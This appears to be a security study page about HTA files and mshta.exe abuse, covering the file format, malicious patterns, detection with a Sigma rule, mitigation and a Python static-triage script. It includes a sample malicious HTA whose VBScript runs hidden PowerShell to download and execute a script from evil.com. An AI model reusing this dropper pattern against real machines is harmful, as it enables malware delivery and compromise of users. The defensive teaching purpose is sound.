HTA (HTML Application)
One-liner: A Windows file format that combines HTML/CSS/JavaScript with full desktop application privileges, frequently abused for malware delivery.
What Is It?
An HTA (HTML Application) is a Microsoft Windows program that uses HTML, CSS, and scripting languages (VBScript or JavaScript) to create a desktop application interface. Unlike regular web pages, which run inside the browser sandbox, HTAs are executed by mshta.exe with the full privileges of the logged-in user, which makes them powerful for both legitimate automation and malicious exploitation.
Why It Matters
- Red Team: HTAs bypass many browser security controls and can execute arbitrary code
- Blue Team: Common initial access vector; detecting `mshta.exe` execution is critical
- MITRE ATT&CK: T1218.005 - Signed Binary Proxy Execution: Mshta
How It Works
Legitimate Use Cases
- Automating administrative or setup tasks
- Providing quick interfaces for internal scripts
- Testing small prototypes without building full software
- Lightweight IT support utilities
HTA File Structure
An HTA contains three main parts:
```html
<html>
  <head>
    <!-- 1. HTA Declaration - defines app properties -->
    <title>TBFC Utility Tool</title>
    <HTA:APPLICATION
      ID="TBFCApp"
      APPLICATIONNAME="Utility Tool"
      BORDER="thin"
      SHOWINTASKBAR="yes"
    />
  </head>
  <body>
    <!-- 2. Interface (HTML/CSS) -->
    <h3>Welcome to the Utility Tool</h3>
    <!-- 3. Script (VBScript or JavaScript) -->
    <script language="VBScript">
      Sub RunAction()
        MsgBox "Action executed!"
      End Sub
    </script>
  </body>
</html>
```
Execution Flow
```text
User opens .hta file
        ↓
Windows launches mshta.exe
        ↓
mshta.exe parses HTML/script
        ↓
Script executes with user privileges
        ↓
Can spawn child processes (powershell, cmd, etc.)
```
Malicious Usage Patterns
| Pattern | Description | Example |
|---|---|---|
| Phishing Delivery | Attached to emails as "invoices" or "surveys" | salary_survey.hta |
| Downloader/Dropper | Fetches second-stage payload from C2 | Invoke-WebRequest in VBScript |
| Obfuscation | Base64/ROT13 encoded payloads | FromBase64String() |
| LOLBAS | Calls built-in Windows tools | powershell.exe, wscript.exe |
Malicious HTA Example
```html
<HTA:APPLICATION SHOWINTASKBAR="no" WINDOWSTATE="minimize">
<script language="VBScript">
Set shell = CreateObject("WScript.Shell")
cmd = "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"
shell.Run cmd, 0, False
self.close
</script>
```
Detection & Prevention
How to Detect
- Process monitoring: Alert on `mshta.exe` spawning child processes (`powershell.exe`, `cmd.exe`, `wscript.exe`)
- Command-line logging: Look for Base64 strings, `-ExecutionPolicy Bypass`, or URLs in arguments
- Network monitoring: Outbound HTTP/HTTPS from `mshta.exe` is highly suspicious
- File analysis: Scan `.hta` files for `CreateObject`, `WScript.Shell`, and encoded strings
Sigma Rule Example
```yaml
title: Mshta Spawning Suspicious Process
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\mshta.exe'
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
      - '\wscript.exe'
  condition: selection
```
How to Prevent / Mitigate
- Block `.hta` files at email gateways
- Restrict `mshta.exe` execution via application whitelisting
- Use Attack Surface Reduction (ASR) rules in Windows Defender
- Disable HTA file associations via Group Policy
Analysis Methodology
When analyzing a suspicious HTA:
- Open in a text editor (never execute!)
- Check metadata: `<title>` and `<HTA:APPLICATION>` for social engineering clues
- Find the script section: Look for `<script language="VBScript">` or `<script language="JavaScript">`
- Identify functions: Search for `Function`, `Sub`, `CreateObject`
- Decode payloads: Extract Base64/encoded strings and decode them with CyberChef
- Trace execution flow: Follow variables to see what gets executed
Interview Angles
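The static steps above, scripted as an added example (not from the original page): it pulls the title and `HTA:APPLICATION` attributes, lists script languages, flags shell-object indicators, decodes quoted Base64 strings (in Python rather than CyberChef), and scores the result. `SAMPLE_HTA`, the `INDICATORS` list and the scoring weights are constructed for illustration; the sample is harmless and its encoded string decodes to plain text.

```python
import base64
import re

# Constructed sample HTA (not a real-world file): hidden window, shell object,
# and one Base64 string that decodes to harmless text.
SAMPLE_HTA = """<html><head><title>Salary Survey 2025</title>
<HTA:APPLICATION ID="app" SHOWINTASKBAR="no" WINDOWSTATE="minimize" />
</head><body>
<script language="VBScript">
Sub Go()
  Set sh = CreateObject("WScript.Shell")
  s = "VGhpcyBpcyBhIHRlc3Q="
End Sub
</script></body></html>"""

# Assumed indicator list: objects/calls that let script reach the OS shell.
INDICATORS = ("CreateObject", "WScript.Shell", "Shell.Application",
              "ActiveXObject", "Run(", ".Run ")
# Quoted runs of Base64 alphabet, 16+ chars, optional padding.
B64_RE = re.compile(r'"([A-Za-z0-9+/]{16,}={0,2})"')


def triage(hta: str) -> dict:
    """Static triage of HTA text: metadata, script blocks, indicators, encoded strings."""
    report = {}
    m = re.search(r"<title>(.*?)</title>", hta, re.I | re.S)
    report["title"] = m.group(1).strip() if m else None
    app = re.search(r"<HTA:APPLICATION(.*?)/?>", hta, re.I | re.S)
    report["app_attrs"] = dict(re.findall(r'(\w+)="([^"]*)"', app.group(1))) if app else {}
    report["script_langs"] = [l.lower() for l in
                              re.findall(r'<script[^>]*language="([^"]+)"', hta, re.I)]
    report["indicators"] = [i for i in INDICATORS if i in hta]
    decoded = []
    for cand in B64_RE.findall(hta):
        try:  # strict decode: skip strings that only look like Base64
            decoded.append(base64.b64decode(cand, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    report["decoded_strings"] = decoded
    # Assumed scoring: hidden window +1, shell object +2, decodable payload +1
    attrs = {k.upper(): v.lower() for k, v in report["app_attrs"].items()}
    score = 0
    if attrs.get("SHOWINTASKBAR") == "no" or attrs.get("WINDOWSTATE") == "minimize":
        score += 1
    if "WScript.Shell" in report["indicators"]:
        score += 2
    if decoded:
        score += 1
    report["score"] = score
    return report
```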
Common Questions
- "What is an HTA file and why is it dangerous?"
- "How would you detect malicious HTA execution in a SOC?"
- "What's the difference between HTA and a regular HTML file?"
STAR Story
Situation: Received an alert for `mshta.exe` spawning `powershell.exe` with encoded command-line arguments.
Task: Investigate whether this was malicious and determine the scope of compromise.
Action: Extracted the HTA file from email logs, decoded the Base64 payload revealing a C2 callback, identified 3 affected hosts via EDR telemetry, and isolated them.
Result: Contained the threat before data exfiltration; created detection rule that caught 2 more attempts the following week.
Related Concepts
- Living off the Land (LOLBAS)
- mshta.exe
- Phishing
- Command and Control (C2)
- Static Analysis
- Data Exfiltration
- Encoding
References
- MITRE ATT&CK T1218.005: https://attack.mitre.org/techniques/T1218/005/
- LOLBAS mshta.exe: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
- Epsilon Red Ransomware HTA Campaign (2025)